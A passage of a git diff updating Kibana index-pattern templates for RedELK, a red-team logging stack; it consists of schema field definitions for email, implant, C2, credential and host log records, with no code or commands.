0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.2", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152841336, 1866], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson index a1f1a36d..985df54b 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson @@ -1 +1 @@ -{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\